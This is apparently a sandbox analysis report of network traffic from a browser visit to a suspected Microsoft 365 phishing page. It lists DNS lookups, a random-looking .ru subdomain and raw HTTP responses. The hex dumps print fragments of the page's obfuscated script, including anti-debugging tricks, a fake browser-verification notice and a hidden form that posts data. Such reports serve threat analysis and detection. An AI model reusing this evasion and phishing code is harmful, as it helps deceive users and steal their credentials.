                                                            Jan 7, 2025 21:28:54.028117895 CET192.168.2.161.1.1.10x980fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.028286934 CET192.168.2.161.1.1.10x21ccStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.757869959 CET192.168.2.161.1.1.10xa00bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.758052111 CET192.168.2.161.1.1.10x5a0fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.820749044 CET192.168.2.161.1.1.10x5e10Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.820935965 CET192.168.2.161.1.1.10xfd9Standard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.403208971 CET192.168.2.161.1.1.10x4be0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.403434038 CET192.168.2.161.1.1.10xd4f1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.420419931 CET192.168.2.161.1.1.10x2bc1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.420960903 CET192.168.2.161.1.1.10xc65fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:56.867439032 CET192.168.2.161.1.1.10xb310Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:56.867747068 CET192.168.2.161.1.1.10xef0eStandard query (0)www.google.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:58.010817051 CET192.168.2.161.1.1.10x55bcStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:58.010989904 CET192.168.2.161.1.1.10xd901Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:29:07.057348013 CET192.168.2.161.1.1.10x4ed0Standard query (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ruA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:07.057657957 CET192.168.2.161.1.1.10xad39Standard query (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru65IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.374011040 CET192.168.2.161.1.1.10x1bc0Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.374332905 CET192.168.2.161.1.1.10x3545Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.375389099 CET192.168.2.161.1.1.10x9923Standard query (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ruA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.375555992 CET192.168.2.161.1.1.10xb7fbStandard query (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru65IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.531014919 CET192.168.2.161.1.1.10x9845Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.531286001 CET192.168.2.161.1.1.10x7274Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.809402943 CET192.168.2.161.1.1.10xf0c0Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.809628963 CET192.168.2.161.1.1.10x84ecStandard query (0)www.office.com65IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.870176077 CET192.168.2.161.1.1.10x711aStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.870465994 CET192.168.2.161.1.1.10x2bdbStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                            Jan 7, 2025 21:29:58.025979996 CET192.168.2.161.1.1.10x1f37Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:58.026123047 CET192.168.2.161.1.1.10xb72eStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 7, 2025 21:28:52.163265944 CET1.1.1.1192.168.2.160xdd20No error (0)brh5.bughtswo.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:52.163894892 CET1.1.1.1192.168.2.160xba4fNo error (0)brh5.bughtswo.com188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:52.163894892 CET1.1.1.1192.168.2.160xba4fNo error (0)brh5.bughtswo.com188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034116983 CET1.1.1.1192.168.2.160x1c8fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034116983 CET1.1.1.1192.168.2.160x1c8fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034116983 CET1.1.1.1192.168.2.160x1c8fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034116983 CET1.1.1.1192.168.2.160x1c8fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034171104 CET1.1.1.1192.168.2.160x3633No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034171104 CET1.1.1.1192.168.2.160x3633No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034396887 CET1.1.1.1192.168.2.160x733aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.034925938 CET1.1.1.1192.168.2.160x21ccNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.035181046 CET1.1.1.1192.168.2.160x980fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.035181046 CET1.1.1.1192.168.2.160x980fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.764324903 CET1.1.1.1192.168.2.160xa00bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.764324903 CET1.1.1.1192.168.2.160xa00bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.764866114 CET1.1.1.1192.168.2.160x5a0fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.828031063 CET1.1.1.1192.168.2.160x5e10No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.828031063 CET1.1.1.1192.168.2.160x5e10No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.828031063 CET1.1.1.1192.168.2.160x5e10No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.828031063 CET1.1.1.1192.168.2.160x5e10No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.409773111 CET1.1.1.1192.168.2.160x4be0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.409773111 CET1.1.1.1192.168.2.160x4be0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.411042929 CET1.1.1.1192.168.2.160xd4f1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.427594900 CET1.1.1.1192.168.2.160xc65fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.428021908 CET1.1.1.1192.168.2.160x2bc1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:55.428021908 CET1.1.1.1192.168.2.160x2bc1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:56.874488115 CET1.1.1.1192.168.2.160xb310No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:56.874631882 CET1.1.1.1192.168.2.160xef0eNo error (0)www.google.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:58.017754078 CET1.1.1.1192.168.2.160x55bcNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:07.108180046 CET1.1.1.1192.168.2.160x4ed0No error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:07.108180046 CET1.1.1.1192.168.2.160x4ed0No error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:07.208336115 CET1.1.1.1192.168.2.160xad39No error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru65IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.381068945 CET1.1.1.1192.168.2.160x1bc0No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.381268978 CET1.1.1.1192.168.2.160x3545No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.437891006 CET1.1.1.1192.168.2.160xb7fbNo error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru65IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.465347052 CET1.1.1.1192.168.2.160x9923No error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:08.465347052 CET1.1.1.1192.168.2.160x9923No error (0)thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.538381100 CET1.1.1.1192.168.2.160x9845No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.538381100 CET1.1.1.1192.168.2.160x9845No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.538589954 CET1.1.1.1192.168.2.160x7274No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:09.538589954 CET1.1.1.1192.168.2.160x7274No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:10.906626940 CET1.1.1.1192.168.2.160xd151No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:10.906626940 CET1.1.1.1192.168.2.160xd151No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.788340092 CET1.1.1.1192.168.2.160x3a48No error (0)shed.dual-low.s-part-0033.t-0009.t-msedge.nets-part-0033.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.788340092 CET1.1.1.1192.168.2.160x3a48No error (0)s-part-0033.t-0009.t-msedge.net13.107.246.61A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.817423105 CET1.1.1.1192.168.2.160xf0c0No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.817423105 CET1.1.1.1192.168.2.160xf0c0No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.817743063 CET1.1.1.1192.168.2.160x84ecNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:11.817743063 CET1.1.1.1192.168.2.160x84ecNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.877341986 CET1.1.1.1192.168.2.160x711aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.877341986 CET1.1.1.1192.168.2.160x711aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.877341986 CET1.1.1.1192.168.2.160x711aNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.877902031 CET1.1.1.1192.168.2.160x2bdbNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:12.877902031 CET1.1.1.1192.168.2.160x2bdbNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:58.033237934 CET1.1.1.1192.168.2.160x1f37No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 7, 2025 21:29:58.033544064 CET1.1.1.1192.168.2.160xb72eNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            • brh5.bughtswo.com
                                                            • https:
                                                              • cdnjs.cloudflare.com
                                                              • code.jquery.com
                                                              • challenges.cloudflare.com
                                                              • thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru
                                                            • a.nel.cloudflare.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1649705188.114.96.34436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:53 UTC651OUTGET /tgs0/ HTTP/1.1
                                                            Host: brh5.bughtswo.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:53 UTC1241INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8Fnr%2F5dblQGBz1DgiOnRxdF7MWc0fywBu9TkFdNbxvWBQdYMjNmp0Q0gm15U3hmIwpNiBqISyA3ZUoVY6yITuShrmKGqOkDcr8TL8nQovjYZHcHT8gN%2BOWnDS9vbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=74928&min_rtt=74918&rtt_var=28115&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1558&delivery_rate=37972&cwnd=59&unsent_bytes=0&cid=5cbcae204196a3e2&ts=265&x=0"
                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IjFLd2JQN09KbXFub0ZsYkZJcnBSYlE9PSIsInZhbHVlIjoiamNwVjNoNVRIU1RVbmxoZDJ2OEl2RlNuSldibmJKZWhFRFRQWmpCU2w3bEY3NndFaFZjYlZkZXZEYW1WY2o1aEpjb1IyV2RyS0x6c1phY2RweXY2VnRxT2R4RENRMEU1TjFDZ1ZZU3RQRGkxcmN1M2pwL2xwK1VLZ2MwV2FBUzkiLCJtYWMiOiIyNjBkZjFkY2ZkNzdkYmFmMzBhMzk4M2E5YzA2MGJjYTBhZTEyNzFlZmUzZDk5YzYwYWY1N2ZiM2VmYTNlYzE2IiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 22:28:53 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                            2025-01-07 20:28:53 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 32 56 46 5a 76 62 57 5a 55 51 57 46 55 63 57 68 71 4e 31 4a 70 4e 6c 6c 6f 53 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 6e 42 50 56 6d 74 6d 53 48 64 53 4e 55 68 5a 52 6b 30 32 51 32 39 49 56 6e 52 6d 52 32 68 32 56 6d 64 50 53 56 70 77 63 6e 5a 47 62 57 5a 51 4f 44 64 32 64 56 5a 4e 63 57 68 6b 54 47 49 35 64 57 67 35 61 32 5a 52 51 6b 35 31 4f 47 70 76 55 33 56 52 52 6c 59 34 52 32 56 48 52 54 55 72 62 30 56 61 4e 6e 46 42 61 57 74 6e 55 45 64 43 56 55 77 31 4f 47 56 6e 61 6d 46 71 56 30 56 58 61 6e 42 4a 52 47 4a 59 56 7a 49 34 57 45 55 31 61 46 46 43 57 48 46 4e 63 69 74 4d 62 69 74 52 54 47 35 46 4b 32 5a 51 64 7a 49
                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlF2VFZvbWZUQWFUcWhqN1JpNlloS3c9PSIsInZhbHVlIjoicnBPVmtmSHdSNUhZRk02Q29IVnRmR2h2VmdPSVpwcnZGbWZQODd2dVZNcWhkTGI5dWg5a2ZRQk51OGpvU3VRRlY4R2VHRTUrb0VaNnFBaWtnUEdCVUw1OGVnamFqV0VXanBJRGJYVzI4WEU1aFFCWHFNcitMbitRTG5FK2ZQdzI
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 34 65 33 65 0d 0a 3c 21 2d 2d 20 44 6f 20 6e 6f 74 20 62 65 20 65 6d 62 61 72 72 61 73 73 65 64 20 62 79 20 79 6f 75 72 20 66 61 69 6c 75 72 65 73 2c 20 6c 65 61 72 6e 20 66 72 6f 6d 20 74 68 65 6d 20 61 6e 64 20 73 74 61 72 74 20 61 67 61 69 6e 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 77 61 6c 6b 69 6e 67 20 66 72 6f 6d 20 66 61 69 6c 75 72 65 20 74 6f 20 66 61 69 6c 75 72 65 20 77 69 74 68 20 6e 6f 20 6c 6f 73 73 20 6f 66 20 65 6e 74 68 75 73 69 61 73 6d 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 69 55 6b 67 31 4c 6d 4a 31 5a 32 68 30 63 33 64 76 4c 6d 4e 76 62 53 39 30 5a 33 4d 77 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65
                                                            Data Ascii: 4e3e... Do not be embarrassed by your failures, learn from them and start again. --><script>/* Success is walking from failure to failure with no loss of enthusiasm. */if(atob("aHR0cHM6Ly9iUkg1LmJ1Z2h0c3dvLmNvbS90Z3MwLw==") == "nomatch"){docume
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 57 4e 4b 63 32 4a 75 52 45 46 71 52 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 6c 6a 53 6e 4e 69 62 6b 52 42 61 6b 55 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 63 79 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d
                                                            Data Ascii: jEuNXJlbTt9DQp9DQojWWNKc2JuREFqRSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1ljSnNibkRBakUuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcycHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVm
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49
                                                            Data Ascii: 93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgI
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 5a 57 47 5a 6e 52 6c 70 74 52 6b 6c 43 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 57 65 46 68 59 56 30 39 31 56 6e 56 30 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 57 65 46 68 59 56 30 39 31 56 6e 56 30 49 43 30 67 57 56 68 6d 5a 30 5a 61 62 55 5a 4a 51 69 41 2b 49 45 70 4f 61 47 46 7a 56 6b 6c 69 5a 55 67 67 4a 69 59 67 49 56 4e 44 53 57 31 75 52 30 4a 50 55 6b 38 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43
                                                            Data Ascii: KICAgICAgICBjb25zdCBZWGZnRlptRklCID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBWeFhYV091VnV0ID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChWeFhYV091VnV0IC0gWVhmZ0ZabUZJQiA+IEpOaGFzVkliZUggJiYgIVNDSW1uR0JPUk8pIHsNCiAgICAgICAgIC
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6d 64 50 56 32 52 42 62 30 39 32 5a 45 67 69 50 67 30 4b 56 6d 56 79 61 57 5a 35 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 6d 62 33 49 67 59 53 42 77 63 6d 39 30 5a 57 4e
                                                            Data Ascii: IiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9ImdPV2RBb092ZEgiPg0KVmVyaWZ5aW5nIHlvdXIgYnJvd3NlciBmb3IgYSBwcm90ZWN
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 32 74 7a 55 30 63 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 68 52 32 68 76 56 30 35 74 62 58 68 44 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a
                                                            Data Ascii: 2tzU0csIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShhR2hvV05tbXhDKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNj
